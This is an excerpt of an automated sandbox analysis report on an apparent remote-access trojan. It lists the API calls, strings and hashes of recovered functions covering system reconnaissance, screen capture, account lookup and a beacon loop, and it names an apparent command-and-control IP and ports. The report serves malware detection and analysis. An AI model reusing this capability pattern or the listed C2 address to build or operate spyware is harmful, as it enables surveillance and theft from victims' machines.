307efff 101->103 102->103 108 3075a19-3075a2e call 307f00a 103->108
                                                                                    APIs
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • _memset.LIBCMT ref: 0307546C
                                                                                    • _memset.LIBCMT ref: 03075485
                                                                                    • _memset.LIBCMT ref: 03075495
                                                                                    • gethostname.WS2_32(?,00000032), ref: 030754A3
                                                                                    • gethostbyname.WS2_32(?), ref: 030754AD
                                                                                    • inet_ntoa.WS2_32 ref: 030754C5
                                                                                    • _strcat_s.LIBCMT ref: 030754D8
                                                                                    • _strcat_s.LIBCMT ref: 030754F1
                                                                                    • inet_ntoa.WS2_32 ref: 0307551A
                                                                                    • _strcat_s.LIBCMT ref: 0307552D
                                                                                    • _strcat_s.LIBCMT ref: 03075546
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03075573
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03075587
                                                                                    • GetLastInputInfo.USER32(?), ref: 0307559A
                                                                                    • GetTickCount.KERNEL32 ref: 030755A0
                                                                                    • wsprintfW.USER32 ref: 030755D5
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 030755E8
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 030755FC
                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03075653
                                                                                    • wsprintfW.USER32 ref: 0307566C
                                                                                    • GetForegroundWindow.USER32 ref: 03075695
                                                                                    • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 030756AC
                                                                                    • lstrlenW.KERNEL32(000008CC), ref: 030756D3
                                                                                    • lstrlenW.KERNEL32(00000994), ref: 03075739
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 030757AA
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 030757B1
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 030757C2
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 030757CD
                                                                                    • wsprintfW.USER32 ref: 03075806
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 03075818
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0307582E
                                                                                    • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0307584B
                                                                                    • CloseHandle.KERNEL32(03095164), ref: 0307587F
                                                                                    • GetTickCount.KERNEL32 ref: 030758E9
                                                                                    • __time64.LIBCMT ref: 030758F8
                                                                                    • __localtime64.LIBCMT ref: 0307592F
                                                                                    • wsprintfW.USER32 ref: 03075968
                                                                                    • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0307597D
                                                                                    • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0307598C
                                                                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 03075999
                                                                                      • Part of subcall function 030780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03078132
                                                                                      • Part of subcall function 030780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03078166
                                                                                      • Part of subcall function 030780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03078176
                                                                                      • Part of subcall function 030780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 030781A6
                                                                                      • Part of subcall function 030780F0: lstrlenW.KERNEL32(?), ref: 030781B7
                                                                                      • Part of subcall function 030780F0: __wcsnicmp.LIBCMT ref: 030781CE
                                                                                      • Part of subcall function 030780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03078204
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                    • String ID: %d min$1.0$2024.12.25$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                    • API String ID: 1101047656-4125556267
                                                                                    • Opcode ID: 652b7bdb181bed7d872046d9ca5c6d8ea17fc3009991f41d0abf9d838b95b5e0
                                                                                    • Instruction ID: 3fb3cfb9101157a24a722d6bacb8bd11023b11e1c24f115a1fc988c5680ffd27
                                                                                    • Opcode Fuzzy Hash: 652b7bdb181bed7d872046d9ca5c6d8ea17fc3009991f41d0abf9d838b95b5e0
                                                                                    • Instruction Fuzzy Hash: 11F1C7B5942308BFDB24EB64CC45FDB73BCBF88700F004959E61AAB181EA74A645CF59
                                                                                    Function 026C0032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 026C04AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 026C04DE
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 026C04F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133872935.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_26c0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual$InfoNativeSystem
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 4117132724-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 0c9ad89cc95d860cf8c6a412b6b7e861e272f514667ba0a5d02e17964a2f73de
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 71627731508385CFD724DF64C840BABBBE4EF94704F24492EE9C99B252E7709989CB96
                                                                                    Function 00D90032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 00D904AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00D904DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_d90000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInfoNativeSystemVirtual
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 2032221330-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 63016dfa7abe4ad6d696b787901e04ac914e03cecb696f51cfac4f10861be449
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 60628C715083858FDB20CF24D840BABBBE5FF94714F18492DE9C99B251E770D988CBA6
                                                                                    Function 0307DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 427 307df10-307df72 call 3080542 Sleep 430 307df97-307df9d 427->430 431 307df74-307df91 call 307f707 call 307fa29 CloseHandle 427->431 432 307dfa4-307e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 307fa29 CloseHandle call 307f707 430->432 433 307df9f call 3077620 430->433 431->430 443 307e01b-307e026 call 3072c90 432->443 444 307e028 432->444 433->432 446 307e02c-307e046 call 307f707 443->446 444->446 450 307e054 446->450 451 307e048-307e049 call 3079730 446->451 453 307e058 450->453 454 307e04e-307e052 451->454 455 307e063-307e06f call 307ce00 453->455 454->453 458 307e071-307e0b7 call 307f876 * 2 455->458 459 307e0b9-307e0fa call 307f876 * 2 455->459 468 307e100-307e110 458->468 459->468 469 307e152-307e15a 468->469 470 307e112-307e14c call 307ce00 call 307f876 * 2 468->470 472 307e162-307e169 469->472 473 307e15c-307e15e 469->473 470->469 475 307e177-307e17b 472->475 476 307e16b-307e175 472->476 473->472 477 307e181-307e187 475->477 476->477 479 307e1c6-307e1ee call 3080542 call 3072da0 477->479 480 307e189-307e1a3 EnumWindows 477->480 488 307e200-307e2ac call 3080542 CreateEventA call 307f876 call 307ca70 479->488 489 307e1f0-307e1fb Sleep 479->489 480->479 482 307e1a5-307e1c4 Sleep EnumWindows 480->482 482->479 482->482 497 307e2b7-307e2bd 488->497 489->455 498 307e2bf-307e2f3 Sleep RegOpenKeyExW 497->498 499 307e318-307e32c call 3075430 497->499 500 307e2f5-307e30b RegQueryValueExW 498->500 501 307e311-307e316 498->501 503 307e331-307e337 499->503 500->501 501->497 501->499 504 307e36a-307e370 503->504 505 307e339-307e365 CloseHandle 503->505 506 307e372-307e38e call 307fa29 504->506 507 307e390 504->507 505->455 508 307e394 506->508 507->508 512 307e396-307e39d 508->512 513 307e39f-307e3ae Sleep 512->513 514 307e40d-307e420 512->514 513->512 515 307e3b0-307e3b7 513->515 518 307e432-307e46c call 3080542 Sleep CloseHandle 514->518 519 307e422-307e42c WaitForSingleObject CloseHandle 514->519 515->514 516 307e3b9-307e3cb 515->516 523 307e3dd-307e408 Sleep CloseHandle 516->523 524 307e3cd-307e3d7 WaitForSingleObject CloseHandle 516->524 518->455 519->518 523->455 524->523
                                                                                    APIs
                                                                                      • Part of subcall function 03080542: __fassign.LIBCMT ref: 03080538
                                                                                    • Sleep.KERNEL32(00000000), ref: 0307DF64
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0307DF91
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0307DFA9
                                                                                    • wsprintfW.USER32 ref: 0307DFE0
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(030775B0), ref: 0307DFEE
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0307E007
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • EnumWindows.USER32(03075CC0,?), ref: 0307E19D
                                                                                    • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0307E1AA
                                                                                    • EnumWindows.USER32(03075CC0,?), ref: 0307E1BE
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0307E1F5
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0307E241
                                                                                    • Sleep.KERNEL32(00000FA0), ref: 0307E2C4
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0307E2EB
                                                                                    • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0307E30B
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E35D
                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 0307E3A4
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0307E3D0
                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0307E3D7
                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 0307E3E2
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E400
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0307E425
                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0307E42C
                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 0307E446
                                                                                    • CloseHandle.KERNEL32(?), ref: 0307E464
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                    • String ID: %4d.%2d.%2d-%2d:%2d:%2d$15091$15091$15092$15093$154.82.85.107$154.82.85.107$154.82.85.107$154.82.85.107$Console$IpDatespecial
                                                                                    • API String ID: 1511462596-2950227363
                                                                                    • Opcode ID: 3c1abfa334580cdf03d01b17a9f95bf479593422920347d4faf14016d77222eb
                                                                                    • Instruction ID: d710dc6f772faddf3bf82e3ab8ab38e08bbad7262ea98696d0cdfb1e15e28c49
                                                                                    • Opcode Fuzzy Hash: 3c1abfa334580cdf03d01b17a9f95bf479593422920347d4faf14016d77222eb
                                                                                    • Instruction Fuzzy Hash: 3CD113B094B701BFD320EF64EC85E6EB7E8BBC4700F004A1EF1558A285DB759855CB6A
                                                                                    Function 0307BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 0307BC8F
                                                                                    • GetDC.USER32 ref: 0307BC9C
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0307BCA2
                                                                                    • GetDC.USER32 ref: 0307BCAD
                                                                                    • GetDeviceCaps.GDI32 ref: 0307BCBA
                                                                                    • GetDeviceCaps.GDI32 ref: 0307BCC2
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0307BCD3
                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 0307BCF8
                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0307BD26
                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 0307BD78
                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 0307BD8D
                                                                                    • CreateCompatibleBitmap.GDI32 ref: 0307BDA6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0307BDB4
                                                                                    • SetStretchBltMode.GDI32 ref: 0307BDC0
                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0307BDCD
                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 0307BDE0
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0307BE07
                                                                                    • _memset.LIBCMT ref: 0307BE7A
                                                                                    • GetDIBits.GDI32 ref: 0307BE97
                                                                                    • _memset.LIBCMT ref: 0307BEAF
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • DeleteObject.GDI32 ref: 0307BF23
                                                                                    • DeleteObject.GDI32 ref: 0307BF2D
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0307BF39
                                                                                    • DeleteObject.GDI32 ref: 0307BFDF
                                                                                    • DeleteObject.GDI32 ref: 0307BFE9
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0307BFF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                    • String ID: ($6$gfff$gfff
                                                                                    • API String ID: 3293817703-713438465
                                                                                    • Opcode ID: 952aa3171e943c09eff1ee0b858e943ef0755318ba86bd6c145429c60828e93c
                                                                                    • Instruction ID: dc1c535542aaf6aa92bf0dc0d3fc7f977c965503d1b18daa7150c12eb72f02b6
                                                                                    • Opcode Fuzzy Hash: 952aa3171e943c09eff1ee0b858e943ef0755318ba86bd6c145429c60828e93c
                                                                                    • Instruction Fuzzy Hash: 13D193B1D02318AFDB10EFE9D885B9EBBB9FF88700F144529F505AB240D774A905CB95
                                                                                    Function 03077490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03075611,0000035E,000002FA), ref: 0307749C
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 030774B2
                                                                                    • swprintf.LIBCMT ref: 030774EF
                                                                                      • Part of subcall function 03077410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03077523), ref: 0307743D
                                                                                      • Part of subcall function 03077410: GetProcAddress.KERNEL32(00000000), ref: 03077444
                                                                                      • Part of subcall function 03077410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 03077452
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03077547
                                                                                    • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03077563
                                                                                    • RegCloseKey.KERNEL32(000002FA), ref: 03077586
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,03075611,0000035E,000002FA), ref: 03077598
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                    • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                    • API String ID: 2158625971-3190923360
                                                                                    • Opcode ID: 913487d4fbfe8c8f57d50503f1572588e8ba10ce941679bcef4068aa09d54462
                                                                                    • Instruction ID: 68c019ae3f54a8010102cbbda4e02e966af5b666522a68d56a3cb0c8734ab1bf
                                                                                    • Opcode Fuzzy Hash: 913487d4fbfe8c8f57d50503f1572588e8ba10ce941679bcef4068aa09d54462
                                                                                    • Instruction Fuzzy Hash: 0431B875A42309BFDB14EBA4CC45EFF77BCEB48780F140519BA05A6146E674DA04C760
                                                                                    Function 030780F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03078132
                                                                                    • lstrcmpiW.KERNEL32(?,A:\), ref: 03078166
                                                                                    • lstrcmpiW.KERNEL32(?,B:\), ref: 03078176
                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 030781A6
                                                                                    • lstrlenW.KERNEL32(?), ref: 030781B7
                                                                                    • __wcsnicmp.LIBCMT ref: 030781CE
                                                                                    • lstrcpyW.KERNEL32(00000AD4,?), ref: 03078204
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 03078228
                                                                                    • lstrcatW.KERNEL32(?,00000000), ref: 03078233
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                    • String ID: A:\$B:\
                                                                                    • API String ID: 950920757-1009255891
                                                                                    • Opcode ID: 7ae2a8180253200027cd7efcf9917fe33937754341154d6ae6c15973edd636d4
                                                                                    • Instruction ID: 7410b839442c9bdafe3c640c93471b2bba68cef27f9fc010c922c832d150849e
                                                                                    • Opcode Fuzzy Hash: 7ae2a8180253200027cd7efcf9917fe33937754341154d6ae6c15973edd636d4
                                                                                    • Instruction Fuzzy Hash: 9B419971E0321CABDB60DF65DD45AEEB3BCFF84610F04459AE909A7140EB74DA05CB98
                                                                                    Function 03076790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 03075320: InterlockedDecrement.KERNEL32(00000008), ref: 0307536F
                                                                                      • Part of subcall function 03075320: SysFreeString.OLEAUT32(00000000), ref: 03075384
                                                                                      • Part of subcall function 03075320: SysAllocString.OLEAUT32(03095148), ref: 030753D5
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03095148,030769A4,03095148,00000000,75BF73E0), ref: 030767F4
                                                                                    • GetLastError.KERNEL32 ref: 030767FE
                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 03076816
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0307681D
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0307683F
                                                                                    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03076871
                                                                                    • GetLastError.KERNEL32 ref: 0307687B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 030768E6
                                                                                    • HeapFree.KERNEL32(00000000), ref: 030768ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                    • String ID: NONE_MAPPED
                                                                                    • API String ID: 1317816589-2950899194
                                                                                    • Opcode ID: 22fae23a5f5ddcc8b09bf2a6b825caab6d85067943ee6222386b340e6e49f2ad
                                                                                    • Instruction ID: 767c358460b52389b205e26be5b4d9b14d296b4e629469df383d345254a47938
                                                                                    • Opcode Fuzzy Hash: 22fae23a5f5ddcc8b09bf2a6b825caab6d85067943ee6222386b340e6e49f2ad
                                                                                    • Instruction Fuzzy Hash: 3141A6B5E0221CAFDB60EB64DC44FEE73BCFBC5700F004599E609AA140DA755A858B68
                                                                                    Function 03076C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03076C8B
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03076CAA
                                                                                    • _memset.LIBCMT ref: 03076CE1
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 03076CF4
                                                                                    • swprintf.LIBCMT ref: 03076D39
                                                                                    • swprintf.LIBCMT ref: 03076D4C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                    • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                    • API String ID: 3202570353-3501811827
                                                                                    • Opcode ID: b700f838c6bd153790acbce69e0d87d29b6f42b8b755107eff5d4eb2a636a37d
                                                                                    • Instruction ID: d4a17c42c87cd42077f7ad06b0ab9dfb2d03be895c4a4345305ca75717c08fd9
                                                                                    • Opcode Fuzzy Hash: b700f838c6bd153790acbce69e0d87d29b6f42b8b755107eff5d4eb2a636a37d
                                                                                    • Instruction Fuzzy Hash: BC3161B6E0120CABDB14DFE5CC45FEEB7B9FB88700F50421EE91AAB241D6745905CB94
                                                                                    Function 03076EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDXGIFactory.DXGI(0309579C,?,2DB1A981,74DEDF80,00000000,75BF73E0), ref: 03076F4A
                                                                                    • swprintf.LIBCMT ref: 0307711E
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 030771C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                    • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                    • API String ID: 3803070356-257307503
                                                                                    • Opcode ID: e0321a8bb4ba9f479615ff0c7064f884bd407f9ec02e734a28a66039ce13db65
                                                                                    • Instruction ID: eec57e5b046cb4de02783557ff2dcd21f33f5598eb34daab7e4aa9b3cd577942
                                                                                    • Opcode Fuzzy Hash: e0321a8bb4ba9f479615ff0c7064f884bd407f9ec02e734a28a66039ce13db65
                                                                                    • Instruction Fuzzy Hash: F0E16571E022259FDF64CE68CC80BFEB3B5BB85740F1445E9D91AA7284D770AE818F94
                                                                                    Function 0040C9BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9EE
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9F7
                                                                                      • Part of subcall function 0040C86C: FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                      • Part of subcall function 0040C86C: FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
